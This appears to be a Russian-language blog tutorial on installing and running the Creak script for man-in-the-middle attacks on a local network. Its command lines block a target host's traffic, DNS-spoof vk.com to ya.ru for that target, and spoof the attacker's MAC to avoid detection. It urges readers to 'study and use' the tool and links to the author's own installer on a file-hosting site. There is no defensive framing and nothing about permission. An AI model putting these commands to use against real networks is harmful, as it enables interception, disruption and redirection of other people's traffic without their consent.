MITM атака с Creak

MITM атака с Creak

Hlink


Всем привет дорогие друзья!

Сегодня мы поговорим о скрипте Creak. Он выполняет некоторые очень известные нападения MITM атакой. И еще, заранее извиняюсь за не четкие скрины.

Некоторые из возможностей:

Запрещает возможность навигации и загрузки целевого хоста в локальной сети.

DNS спуфинг

ARP спуфинг

Генерация нового MAC адреса для проведения атаки.

Кража TCP сеансов по десинхронизации.

И многое другое. А теперь давайте установим Creak

Имеются зависимости:

  1. Pcap библиотеки
  2. libdnet (dnet модуль)
  3. Может быть необходим scapy.

Код:

1. pip install dpkt
2. pip install pypcap

А вот с библиотекой dnet получается немного сложнее.

Код:

1. git clone https://github.com/dugsong/libdnet
2. ./configure && make && make install
3. cd python && python setup.py build
(установка описана в файле /libdnet/INSTALL)

Немного помучавшись с зависимостями идем далее. 

Если кто знает как можно проще установить libdnet, напишите в комментарии))


Устанавливаем 

Код:

1. git clone https://github.com/codepr/creak.git
2. cd creak
3. python setup.py install
4. chmod +x creak.py
MITM атака с Creak

 

Если ты лентяй, то специально для тебя в конце статьи простенький bash скрипт для установки зависимостей и самого скрипта(о всех ошибках пишите в комментариях под статьей ибо скрипт для установки мой)


Посмотрим весь функционал.

Код:

./ creak.py --help


MITM атака с Creak

 

Спойлер


Теперь перейдем непосредственно к работе.

Давайте посмотрим какой интерфейс у нас на карте(название). Те кто не помнит, это для вас

Код:

iwconfig


MITM атака с Creak

 


1. По умолчанию creak запрещает трафик на определенный хост. Для этого просто задаем имя целевого хоста

Код:

./creak.py -t 192.168.1.2 wlan0


MITM атака с Creak

 

Также creak можно не задавать таргет опцией, тогда creak сам спросит его у вас

MITM атака с Creak

 

2. А как же без DNS спуфинга друзья?

Код:

./creak.py -t 192.168.1.2 -a vk.com -r ya.ru wlan0

В моем примере vk.com это тот сайт который будет посещать пользователь, ya.ru это сайт на который пользователя перенаправит при посещении сайта vk.com


Также для своей безопасности можете добавить опцию " -x" которая проведет spoof mac address т.е. сменит ваш MAC.


А на этом все друзья! Изучайте и пользуйтесь))

Скрипт очень полезен, но имеются некоторые баги которые легко исправимы.



Мой утановщик можно скачать тут - http://rgho.st/89nWT2dv6